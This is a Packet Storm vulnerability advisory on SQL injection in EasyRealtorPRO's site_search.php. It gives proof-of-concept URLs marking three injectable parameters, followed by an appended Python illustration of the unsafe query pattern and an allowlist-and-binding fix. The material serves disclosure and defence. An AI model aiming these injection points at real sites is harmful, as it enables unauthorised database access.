easyrealtor-sql.txt

2008-09-25T00:00:00
ID PACKETSTORM:70356
Type packetstorm
Reporter SmOk3
Modified 2008-09-25T00:00:00

Description

                                        
Original article:
http://www.davidsopas.com/2008/09/sql-injection-in-easyrealtorpro/
  
  
"EasyRealtorPRO 2008 provides you with all features you need to setup
your own business oriented real estate website on your own domain
name. Our support team will install the script on your server and then
you can start selling packages to home sellers at ease." (from the vendor
website, easyrealtorpro.com)
  
This PHP script is vulnerable to SQL injection in the file site_search.php.

By manipulating the unfiltered variables, a user can execute SQL commands
to gather other information. The problem is located in the variables
item, search_ordermethod and search_order.
  
Proof of concept:  
  
site_search.php?search_purpose=sale&search_type=&  
search_price_min=&search_price_max=&search_bedroom=1&  
search_bathroom=1&search_city=&search_state=&  
search_zip=&search_radius=&search_country=&  
search_order=type&search_ordermethod=asc&page=2&  
item=5'SQL INJECTION  
  
site_search.php?search_purpose=sale&search_type=&  
search_price_min=&search_price_max=&search_bedroom=1&  
search_bathroom=1&search_city=&search_state=&  
search_zip=&search_radius=&search_country=&  
search_order=type&search_ordermethod=asc'SQL INJECTION&  
page=2&item=5  
  
site_search.php?search_purpose=sale&search_type=&  
search_price_min=&search_price_max=&search_bedroom=1&  
search_bathroom=1&search_city=&search_state=&  
search_zip=&search_radius=&search_country=&  
search_order=type'SQL INJECTION&search_ordermethod=asc&  
page=2&item=5  
  
Solution: The vendor was contacted 2 weeks ago and has still not replied to
my email. It can be fixed by sanitizing the variables.
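A defender-side illustration of the defect and of the sanitizing fix, added here and not taken from the advisory or from EasyRealtorPRO (whose site_search.php source is not on this page): the `listings` schema, the sample rows and the shape of the search query are constructed assumptions. It shows a query builder that pastes `item`, `search_order` and `search_ordermethod` into the SQL text beside a hardened version that allowlists the ORDER BY column and direction (which cannot be bound as parameters) and binds the numeric values, and it checks that inputs of the proof-of-concept shape (a quote appended to a parameter) are rejected before any query is built.

```python
"""Added illustration of the advisory's defect and its fix; not code from
EasyRealtorPRO. The `listings` schema, the sample rows and the shape of the
search query are constructed assumptions, since the real site_search.php
source is not on the page."""
import sqlite3

# Constructed sample listings (id, type, price, bedroom, bathroom).
SAMPLE_ROWS = [
    (1, "house", 250000, 3, 2),
    (2, "apartment", 120000, 1, 1),
    (3, "house", 400000, 4, 3),
    (4, "condo", 180000, 2, 1),
]


def make_db():
    """In-memory stand-in for the real estate database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE listings (id INTEGER, type TEXT, price INTEGER, "
                 "bedroom INTEGER, bathroom INTEGER)")
    conn.executemany("INSERT INTO listings VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_query_unsafe(params):
    """The pattern the advisory describes (assumed query shape): request
    values are pasted into the SQL text, so a quote in search_order,
    search_ordermethod or item reaches the SQL parser as syntax."""
    return (
        "SELECT id, type, price FROM listings "
        f"WHERE bedroom >= {params.get('search_bedroom', 0)} "
        f"ORDER BY {params.get('search_order', 'price')} "
        f"{params.get('search_ordermethod', 'asc')} "
        f"LIMIT {params.get('item', 10)}"
    )


def unsafe_query_is_malformed(conn, params):
    """True when the concatenated statement no longer parses, i.e. the
    request value changed the SQL instead of being treated as data."""
    try:
        conn.execute(build_query_unsafe(params))
        return False
    except sqlite3.OperationalError:
        return True


class BadRequest(ValueError):
    """Raised for any request value that fails validation."""


# ORDER BY column and direction cannot be bound as parameters, so they are
# mapped through fixed allowlists and only the canonical value is used.
ALLOWED_ORDER_COLUMNS = {"type": "type", "price": "price",
                         "bedroom": "bedroom", "bathroom": "bathroom"}
ALLOWED_ORDER_METHODS = {"asc": "ASC", "desc": "DESC"}


def build_query_safe(params):
    """Hardened builder: allowlisted sort clause, bound numeric values."""
    column = ALLOWED_ORDER_COLUMNS.get(str(params.get("search_order", "price")))
    if column is None:
        raise BadRequest("search_order is not a sortable column")
    method = ALLOWED_ORDER_METHODS.get(
        str(params.get("search_ordermethod", "asc")).lower())
    if method is None:
        raise BadRequest("search_ordermethod must be asc or desc")
    # Numeric inputs are converted (anything that is not an integer is
    # rejected) and then bound as parameters, never interpolated.
    try:
        bedroom = int(params.get("search_bedroom", 0))
        item = int(params.get("item", 10))
        page = int(params.get("page", 1))
    except (TypeError, ValueError):
        raise BadRequest("search_bedroom, item and page must be integers")
    if not (1 <= item <= 100 and page >= 1):
        raise BadRequest("paging values out of range")
    sql = ("SELECT id, type, price FROM listings WHERE bedroom >= ? "
           f"ORDER BY {column} {method} LIMIT ? OFFSET ?")
    return sql, (bedroom, item, (page - 1) * item)


def search(conn, params):
    """Hardened handler: validate, then run with bound parameters."""
    sql, args = build_query_safe(params)
    return conn.execute(sql, args).fetchall()


if __name__ == "__main__":
    db = make_db()
    ok = {"search_bedroom": "1", "search_order": "price",
          "search_ordermethod": "asc", "page": "1", "item": "2"}
    print(search(db, ok))
    # Same shape as the advisory's proof of concept (a quote appended to
    # search_ordermethod): the unsafe builder hands it to the SQL parser,
    # the hardened builder refuses it before any query is built.
    bad = dict(ok, search_ordermethod="asc'SQL INJECTION")
    print(unsafe_query_is_malformed(db, bad))
    try:
        search(db, bad)
    except BadRequest as exc:
        print("rejected:", exc)
```

The allowlist is the part that escaping alone cannot replace: a column name or sort direction is SQL syntax, not a value, so the fix is to map the request string onto a fixed set of known-good identifiers and refuse everything else, while `item`, `page` and the numeric filters go through integer conversion and parameter binding.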